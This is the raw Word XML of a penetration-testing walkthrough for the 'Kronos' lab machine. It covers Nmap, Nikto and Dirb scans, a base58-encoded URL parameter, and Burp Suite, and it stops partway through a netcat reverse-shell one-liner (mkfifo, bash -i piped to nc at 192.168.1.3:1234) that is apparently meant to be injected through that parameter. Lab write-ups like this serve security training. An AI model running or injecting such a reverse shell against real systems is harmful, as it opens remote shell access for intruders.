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CB245BF" w:rsidR="00C173B3" w:rsidRDefault="00775F2D" w:rsidP="00DC0550">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Walkthrough </w:t>
      </w:r>
      <w:r w:rsidR="00A40A37">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C7D1B">
        <w:t>Kronos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080D60A9" w14:textId="3F266928" w:rsidR="005A03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20090" w:history="1">
            <w:r w:rsidR="005A030E" w:rsidRPr="0002535D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host Discovery</w:t>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc146220090 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005A030E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0441DF9B" w14:textId="4CC3EFB5" w:rsidR="005A030E" w:rsidRDefault="005A03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20091" w:history="1">
            <w:r w:rsidRPr="0002535D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F73A" w14:textId="28D44C56" w:rsidR="005A030E" w:rsidRDefault="005A03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20092" w:history="1">
            <w:r w:rsidRPr="0002535D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5592" w14:textId="6CCBE703" w:rsidR="005A030E" w:rsidRDefault="005A03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20093" w:history="1">
            <w:r w:rsidRPr="0002535D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9249" w14:textId="41BF9529" w:rsidR="005A030E" w:rsidRDefault="005A03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20094" w:history="1">
            <w:r w:rsidRPr="0002535D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4E73E8F7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47EF8CE3" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="39F9EEB5" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="012CA771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B42EE0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc146220090"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5EC1B087" w14:textId="6860D464" w:rsidR="00D21621" w:rsidRDefault="002A65A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="444D2CD0" wp14:editId="2CA52171">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>171953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3776345" cy="594360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20769"/>
                <wp:lineTo x="21466" y="20769"/>
                <wp:lineTo x="21466" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="862177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778" name="Picture 1" descr="A black background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52EC74" wp14:editId="2E46D6B1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2570480" cy="144780"/>
            <wp:effectExtent l="0" t="0" r="1270" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19895"/>
                <wp:lineTo x="21451" y="19895"/>
                <wp:lineTo x="21451" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="211388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8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843" cy="15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377E" w14:textId="24C93424" w:rsidR="00D21621" w:rsidRDefault="00D21621"/>
    <w:p w14:paraId="65BC8C90" w14:textId="77777777" w:rsidR="00C746CA" w:rsidRDefault="00C746CA"/>
    <w:p w14:paraId="1CA49C74" w14:textId="4A6D56A2" w:rsidR="00C746CA" w:rsidRDefault="00110171">
      <w:r w:rsidRPr="00F70C1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B70E9A2" w14:textId="01B070B6" w:rsidR="00AA0C73" w:rsidRDefault="00AA0C73">
      <w:r w:rsidRPr="00F70C1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD5B9C" w14:textId="7327EFB1" w:rsidR="00DC0550" w:rsidRDefault="00DC0550" w:rsidP="00892B8A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc146220091"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="07ABA748" w14:textId="555A213E" w:rsidR="00D21621" w:rsidRDefault="0097715A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="796F5177" wp14:editId="7DBA391C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>172712</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1660525" cy="557530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20665"/>
                <wp:lineTo x="21311" y="20665"/>
                <wp:lineTo x="21311" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13364901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0193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5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63D3A594" wp14:editId="03AC8905">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>23857</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2380615" cy="128905"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19153"/>
                <wp:lineTo x="21433" y="19153"/>
                <wp:lineTo x="21433" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="38573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3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118" cy="13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B4658" w14:textId="2CEB2E40" w:rsidR="00D21621" w:rsidRDefault="00D21621"/>
    <w:p w14:paraId="67CEF0BF" w14:textId="0B26D017" w:rsidR="00773575" w:rsidRDefault="00495596">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B0BE2B5" wp14:editId="3083AAF7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>159525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2921000" cy="142240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="17357"/>
                <wp:lineTo x="21412" y="17357"/>
                <wp:lineTo x="21412" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="183190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02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71DA7" w14:textId="6B09B408" w:rsidR="00773575" w:rsidRDefault="005C56B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73F26FBC" wp14:editId="6E4C8127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485005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8" y="20700"/>
                <wp:lineTo x="21468" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="182613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35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B8D82" w14:textId="77777777" w:rsidR="00773575" w:rsidRDefault="00773575"/>
    <w:p w14:paraId="09FD2058" w14:textId="532BD034" w:rsidR="00DC0550" w:rsidRDefault="00DC0550" w:rsidP="00892B8A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc146220092"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B397DA3" w14:textId="76934D0C" w:rsidR="00D21621" w:rsidRDefault="00643155">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C161035" wp14:editId="0BFFAAD1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>42132</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1709420" cy="151130"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19059"/>
                <wp:lineTo x="21423" y="19059"/>
                <wp:lineTo x="21423" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="165105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6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C857" w14:textId="264F7122" w:rsidR="00D21621" w:rsidRDefault="00643155">
      <w:r>
        <w:t xml:space="preserve">This found nothing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>really special</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07510DD5" w14:textId="1B2A84EB" w:rsidR="00FC5350" w:rsidRDefault="00FC5350" w:rsidP="00E574B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D353059" w14:textId="012C2FB0" w:rsidR="00FC5350" w:rsidRDefault="0097351B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="482B6F66" wp14:editId="366C84B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259682</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3335655" cy="480695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20544"/>
                <wp:lineTo x="21464" y="20544"/>
                <wp:lineTo x="21464" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="17702431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43177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F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CC0EB4A" wp14:editId="7770C152">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>35098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1787525" cy="177800"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18514"/>
                <wp:lineTo x="21408" y="18514"/>
                <wp:lineTo x="21408" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="30684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5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823" cy="182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A628E" w14:textId="292EBD98" w:rsidR="00FC5350" w:rsidRDefault="00FC5350"/>
    <w:p w14:paraId="4E365FD2" w14:textId="77777777" w:rsidR="0097351B" w:rsidRDefault="0097351B"/>
    <w:p w14:paraId="0DD529EE" w14:textId="5D8F6034" w:rsidR="0097351B" w:rsidRDefault="00977C7B">
      <w:r>
        <w:t>It didn’t really find anything of use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA090C" w14:textId="7B7A0B1A" w:rsidR="00DC0550" w:rsidRDefault="00DC0550" w:rsidP="00892B8A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc146220093"/>
      <w:r>
        <w:t>Viewing Website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7749EF15" w14:textId="1853D352" w:rsidR="00D21621" w:rsidRDefault="00040CBC">
      <w:r>
        <w:t>Looking at the site, it appears to just be text with a black background.</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D21C12" w14:textId="48542231" w:rsidR="00BC6A2A" w:rsidRDefault="00BC6A2A" w:rsidP="00026445">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0C21C" w14:textId="7D19827B" w:rsidR="00BC6A2A" w:rsidRDefault="00507371">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E119A68" wp14:editId="56AFA5E3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>243658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="288925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19938"/>
                <wp:lineTo x="21538" y="19938"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="201381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5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5F4">
        <w:t>Looking at the source there is a URL in there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4E8A1" w14:textId="08CA800D" w:rsidR="00B43545" w:rsidRDefault="00C668EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03323C73" wp14:editId="5B9F26A6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>520914</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2146300" cy="302260"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20420"/>
                <wp:lineTo x="21472" y="20420"/>
                <wp:lineTo x="21472" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="88702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22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F1">
        <w:t xml:space="preserve">I then added the domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BA41F1">
        <w:t>chronos.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BA41F1">
        <w:t xml:space="preserve"> into my /etc/hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C46B78F" w14:textId="4E680D13" w:rsidR="00C668EE" w:rsidRDefault="00C668EE"/>
    <w:p w14:paraId="52308A05" w14:textId="4EFCF056" w:rsidR="00C668EE" w:rsidRDefault="00A06CB6">
      <w:r>
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="00452BCF">
        <w:t xml:space="preserve"> visiting that specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452BCF">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00452BCF">
        <w:t xml:space="preserve"> gives me permission denied.</w:t>
      </w:r>
      <w:r w:rsidR="00810755">
        <w:t xml:space="preserve"> Looking at </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00810755" w:rsidRPr="00CA2EF0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://chronos.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810755">
        <w:t xml:space="preserve"> shows me the same page but with the current date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BCED0D" w14:textId="6CB68AF2" w:rsidR="00D21621" w:rsidRDefault="00AB4AC5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C9E863A" wp14:editId="1836C460">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>226530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2952381" cy="352381"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19884"/>
                <wp:lineTo x="21465" y="19884"/>
                <wp:lineTo x="21465" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="30311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18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C4" w:rsidRPr="005805C4">
        <w:t>4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL</w:t>
      </w:r>
      <w:r w:rsidR="005805C4">
        <w:t xml:space="preserve"> is in base58.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE29BE1" w14:textId="77777777" w:rsidR="00D14275" w:rsidRDefault="00D14275"/>
    <w:p w14:paraId="5DDDD7E6" w14:textId="7A413FFC" w:rsidR="009021C0" w:rsidRDefault="009021C0" w:rsidP="00456858">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc146220094"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0788E83E" w14:textId="6BEF7EBC" w:rsidR="003A568C" w:rsidRDefault="00F26B47" w:rsidP="007E0CD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE491BA" w14:textId="0E8A10BB" w:rsidR="00FB64AE" w:rsidRDefault="00DF1DDC">
      <w:r>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> burp and send a request to that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC1209" w14:textId="6A29555E" w:rsidR="003A568C" w:rsidRDefault="000F7507">
      <w:r w:rsidRPr="000F7507">
        <w:t>http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D0FE4" w14:textId="6472FF85" w:rsidR="00552A78" w:rsidRPr="00552A78" w:rsidRDefault="00552A78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> One Liner to base58.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB478E" w14:textId="77777777" w:rsidR="00552A78" w:rsidRPr="00552A78" w:rsidRDefault="00552A78" w:rsidP="00552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552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/f|/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1|nc 192.168.1.3 1234 &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00552A78">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-AU"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
